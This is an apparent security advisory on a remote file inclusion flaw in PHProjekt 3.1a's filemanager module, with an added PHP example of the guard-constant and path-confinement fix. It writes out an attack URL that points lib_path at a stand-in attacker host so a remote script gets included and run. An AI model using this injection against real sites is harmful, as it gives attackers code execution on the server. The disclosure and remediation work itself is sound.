COMMAND
PHProjekt arbitrary command execution
SYSTEMS AFFECTED
3.1a and previous
PROBLEM
b0iler found the following:
This script is a content management system for websites, much like
slashcode or phpnuke.
The problem is in the filemanager module, where you can directly
access the module and then define values which would have been defined
by the script's global configuration file had the module not been
accessed directly. The first line in filemanager/filemanager_forms.php
is:
include_once("$lib_path/access_form.inc.php");
so an attacker could go to
http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
and the script at http://hacker.com/nasty/scripts/access_form.inc.php
would get include()'d. I am sure you have seen the remotely included
scripts with the passthru() example many times.
If PHP is compiled with allow_url_fopen off then an attacker would have a
harder time exploiting this. I can only see guessing the path to an
uploaded script as the other way of exploiting this (if
magic_quotes is on - else a null byte can do some damage). I believe it
is secure since if they upload a script with the name lib_path the path
(ex. /tmp/random/access_form.inc.php) will be stored in $lib_path. This
would make the include_once try to include
/tmp/random/access_form.inc.php/access_form.inc.php which would not
work. PHP will delete this /tmp/randomcharacters/access_form.php when
it ends, so it cannot be sent as lib_path once the error msg (if
display_errors is on) tells the attacker the path to the script. I
heard concerns about this from someone running PHP who wanted a secure
install and configuration.
It would be best if all the modules included the global configuration
file as their first line and double-checked to make sure no variables are
left for other scripts to pass in. Or some sort of modules.php script
like phpnuke has wouldn't be a bad idea either, and it locks down security by
making sure the script isn't called directly.
SOLUTION
The author took this advice and added this as the first line in the
module:
if (!defined("lib_included")) { die("Please use index.php!"); }
Since I believe constants cannot be defined with GPC.
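The following is an added example, not PHProjekt's own code, showing in one runnable file the two halves of the fix described above: a front controller that defines the marker constant and a fixed library path, and a module guard that refuses to run unless that constant exists. It goes one step beyond the advisory by also confining the computed include path to a fixed directory, so that a path value can never name a URL wrapper or a file outside lib/. The names lib_included, $lib_path and access_form.inc.php come from the advisory; the function names, the lib/ directory and the HTTP 403 response are assumptions.

```php
<?php
// Added example, not PHProjekt's own code. Names lib_included, $lib_path
// and access_form.inc.php come from the advisory; module_guard(),
// safe_lib_file(), the lib/ directory and the 403 response are assumed.

// --- What the vulnerable module relied on ---------------------------------
// With register_globals on (the PHP default before 4.2), a request such as
//   filemanager_forms.php?lib_path=http://host.example/dir
// created $lib_path before the module's first line executed, so
//   include_once("$lib_path/access_form.inc.php");
// fetched and ran a file chosen by the client. The fix is to make sure that
// line can only ever run after the trusted configuration has been loaded.

// --- Guard placed as the first statement of every module file -------------
function module_guard()
{
    if (!defined('lib_included')) {
        // The front controller never ran, so nothing trustworthy defined
        // $lib_path. Stop before any include_once is reached. A constant
        // cannot be set from GET/POST/COOKIE data, so a direct request
        // cannot forge it even with register_globals on.
        header('HTTP/1.1 403 Forbidden');
        die('Please use index.php!');
    }
}

// --- Confining a computed include path to a fixed directory --------------
// Belt and braces: even once the guard is in place, never build an include
// path from anything that might have come from the request. This helper
// accepts only a plain file name and requires the resolved path to stay
// under $base, which rejects URL wrappers (http://, ftp://, php://),
// null bytes and ../ traversal in one check.
function safe_lib_file($base, $file)
{
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9_.]*\z/', $file)) {
        return null;                       // not a plain file name
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($baseReal === false || $target === false) {
        return null;                       // directory or file does not exist
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside lib/ (symlink or ..)
    }
    return $target;
}

// --- Front controller (index.php) -----------------------------------------
define('lib_included', true);              // marker the modules test for
$lib_path = __DIR__ . '/lib';              // set server-side, never from GET

module_guard();                            // passes here: constant is defined
$form_lib = safe_lib_file($lib_path, 'access_form.inc.php');
if ($form_lib === null) {
    die('access_form.inc.php not found under lib/');
}
include_once $form_lib;
```

The guard is deliberately the first statement: any include_once that precedes it would already have run with whatever $lib_path held. The realpath() confinement is what makes a leaked temp-file path or a guessed upload path useless as a library location, independent of the allow_url_fopen and display_errors settings the advisory discusses.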
The author was contacted a few days ago and was very quick to respond.
They also took the security problem seriously, got out a patch ASAP,
and notified their mailing list. The author says the script will be in
for a rewrite to help improve overall security and structure. A new
version will be out shortly.